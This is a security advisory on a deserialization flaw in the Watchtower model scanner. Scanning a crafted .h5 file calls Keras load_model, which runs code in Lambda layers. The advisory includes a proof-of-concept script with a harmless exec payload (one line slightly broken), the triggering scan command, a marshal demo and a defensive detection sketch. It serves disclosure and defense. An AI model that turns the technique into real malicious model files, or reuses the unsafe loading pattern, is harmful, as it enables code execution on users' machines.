keras.models.load_model when scanning .h5 files leads to arbitrary code execution

December 16, 2024

Products Impacted

This vulnerability is present in Watchtower v0.9.0-beta up to v1.2.2.

CVSS Score: 7.8

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data.

Details

To exploit this vulnerability, an attacker would create a malicious .h5 file that executes code when loaded and send it to the victim. The following script creates such a file:

import tensorflow as tf

def example_payload(*args, **kwargs):

exec("""

print("")

print('Arbitrary code execution')

print("")""")

return 10

num_classes = 10

input_shape = (28, 28, 1)

model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(example_payload, name="custom")])



model.save("backdoored_model.h5", save_format="h5"The victim would then attempt to scan the file to see if it’s malicious using this command, as per the watchtower documentation in the readme:

```bash
python watchtower.py --repo_type file --path backdoored_model.h5
```

The code injected into the file by the attacker would then execute, compromising the victim's machine. This happens because unsafe_check_h5 in watchtower/src/utils/model_inspector_util.py, the function Watchtower uses to scan .h5 files, calls keras.models.load_model on the file. Loading a .h5 file with this function rebuilds any Lambda layers it contains and runs their functions, which executes the attacker's payload. A user could also trigger the same code path by scanning the file from a GitHub or HuggingFace repository with Watchtower's built-in functionality.
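To see why loading alone is enough, the sketch below imitates, in simplified form, how tf.keras saves a Lambda layer's Python function in its legacy formats: the function's bytecode is serialized with `marshal`, base64-encoded into the layer config, and rebuilt with `types.FunctionType` when the model is loaded. The helper names `dump_function` and `load_function` are hypothetical, and real Keras handles details (closures, default arguments, module globals) that are omitted here. It uses only the standard library, so no TensorFlow is needed. Nothing in the load step inspects the bytecode, so whatever the attacker wrote runs as soon as the rebuilt function is called.

```python
import base64
import marshal
import types

# Stands in for any side effect an attacker might want (file writes, shell commands, ...).
EXECUTED: list[str] = []


def example_payload(*args, **kwargs):
    EXECUTED.append("payload ran")
    return 10


def dump_function(func) -> str:
    """Serialize a function's bytecode to text (hypothetical helper, modeled on tf.keras)."""
    return base64.b64encode(marshal.dumps(func.__code__)).decode("ascii")


def load_function(encoded: str):
    """Rebuild a function from text. Nothing here checks what the bytecode does."""
    code = marshal.loads(base64.b64decode(encoded))
    return types.FunctionType(code, globals(), code.co_name)


# Attacker side: the payload's bytecode becomes plain data stored in the model file.
stored = dump_function(example_payload)

# Victim side: restoring the layer rebuilds the function, and building the
# model calls it, which runs the attacker's code.
restored = load_function(stored)
result = restored()
```

After this runs, `EXECUTED` contains one entry even though `example_payload` was never called directly; only the function rebuilt from the stored text was.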

The vulnerable call in unsafe_check_h5 (excerpt):

```python
def unsafe_check_h5(model_path: str):
    """
    The unsafe_check_h5 function is designed to inspect models with the .h5 extension for potential vulnerabilities.

    ...

    """
    tool_output = list()
    try:
        # Try loading the model without custom objects
        model = keras.models.load_model(model_path, custom_objects={})
        # ... (remainder of function omitted)
```

Passing an empty custom_objects dictionary does not prevent the attack: Lambda is a built-in Keras layer, so its serialized function is restored without any custom objects being supplied.

Additionally, the scanner doesn’t detect that the .h5 file is malicious, so the user has no indication they’ve been compromised.
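One way a scanner could avoid this is to read the model architecture as data instead of loading the model. The sketch below assumes the legacy Keras HDF5 layout, in which the architecture is stored as a JSON string in the file's root-level `model_config` attribute, and uses the third-party `h5py` package to read it. It is not Watchtower's code, and the function names `find_lambda_layers` and `lambda_layers_in_h5` are hypothetical. The config walk is pure standard library and recursive, so Lambda layers nested inside sub-models are also reported.

```python
import json
from typing import Any


def find_lambda_layers(config: Any) -> list[str]:
    """Return the names of all Lambda layers in a parsed Keras model config."""
    found: list[str] = []
    if isinstance(config, dict):
        if config.get("class_name") == "Lambda":
            layer_cfg = config.get("config")
            name = layer_cfg.get("name") if isinstance(layer_cfg, dict) else None
            found.append(name or "<unnamed>")
        # Recurse into every value so nested sub-models are covered.
        for value in config.values():
            found.extend(find_lambda_layers(value))
    elif isinstance(config, list):
        for item in config:
            found.extend(find_lambda_layers(item))
    return found


def lambda_layers_in_h5(path: str) -> list[str]:
    """List Lambda layers in a legacy .h5 file WITHOUT deserializing the model.

    Assumes the architecture JSON lives in the root-level "model_config" attribute.
    """
    import h5py  # third-party; imported lazily so find_lambda_layers works without it

    with h5py.File(path, "r") as f:
        raw = f.attrs.get("model_config")
    if raw is None:
        return []  # no architecture stored (for example, a weights-only file)
    if isinstance(raw, bytes):
        raw = raw.decode("utf-8")
    return find_lambda_layers(json.loads(raw))
```

For the file built by the script above, `lambda_layers_in_h5("backdoored_model.h5")` would be expected to report the layer named `custom`, and a scanner could flag the file and refuse to call `load_model` on it. This covers only the Lambda-layer vector described in this advisory; an empty result does not prove a file is safe.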
